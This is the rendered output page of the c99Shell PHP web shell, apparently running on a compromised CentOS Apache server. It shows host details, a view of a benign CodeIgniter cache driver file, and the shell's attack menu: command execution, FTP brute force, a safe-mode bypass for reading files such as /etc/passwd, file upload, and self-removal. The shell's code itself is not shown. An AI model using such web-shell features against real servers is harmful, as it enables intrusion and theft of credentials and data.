!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/cvc/system/libraries/Cache/drivers/   drwxr-xr-x
Free 40.45 GB of 127.8 GB (31.65%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Cache_dummy.php (2.6 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');
/**
 * CodeIgniter
 *
 * An open source application development framework for PHP 4.3.2 or newer
 *
 * @package        CodeIgniter
 * @author        ExpressionEngine Dev Team
 * @copyright    Copyright (c) 2006 - 2011 EllisLab, Inc.
 * @license        http://codeigniter.com/user_guide/license.html
 * @link        http://codeigniter.com
 * @since        Version 2.0
 * @filesource    
 */

// ------------------------------------------------------------------------

/**
 * CodeIgniter Dummy Caching Class 
 *
 * @package        CodeIgniter
 * @subpackage    Libraries
 * @category    Core
 * @author        ExpressionEngine Dev Team
 * @link        
 */

class CI_Cache_dummy extends CI_Driver {

    
/**
     * Get 
     *
     * Since this is the dummy class, it's always going to return FALSE.
     *
     * @param     string    
     * @return     Boolean        FALSE
     */
    
public function get($id)
    {
        return 
FALSE;
    }

    
// ------------------------------------------------------------------------    
    
    /**
     * Cache Save
     *
     * @param     string        Unique Key
     * @param     mixed        Data to store
     * @param     int            Length of time (in seconds) to cache the data
     *
     * @return     boolean        TRUE, Simulating success
     */
    
public function save($id$data$ttl 60)
    {
        return 
TRUE;
    }
    
    
// ------------------------------------------------------------------------

    /**
     * Delete from Cache
     *
     * @param     mixed        unique identifier of the item in the cache
     * @param     boolean        TRUE, simulating success
     */
    
public function delete($id)
    {
        return 
TRUE;
    }

    
// ------------------------------------------------------------------------

    /**
     * Clean the cache
     *
     * @return     boolean        TRUE, simulating success
     */
    
public function clean()
    {
        return 
TRUE;
    }

    
// ------------------------------------------------------------------------

    /**
     * Cache Info
     *
     * @param     string        user/filehits
     * @return     boolean        FALSE
     */
     
public function cache_info($type NULL)
     {
         return 
FALSE;
     }

    
// ------------------------------------------------------------------------

    /**
     * Get Cache Metadata
     *
     * @param     mixed        key to get cache metadata on
     * @return     boolean        FALSE
     */
    
public function get_metadata($id)
    {
        return 
FALSE;
    }

    
// ------------------------------------------------------------------------

    /**
     * Is this caching driver supported on the system?
     * Of course this one is.
     * 
     * @return TRUE;
     */
    
public function is_supported()
    {
        return 
TRUE;
    }

    
// ------------------------------------------------------------------------
    
}
// End Class

/* End of file Cache_apc.php */
/* Location: ./system/libraries/Cache/drivers/Cache_apc.php */

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0167 ]--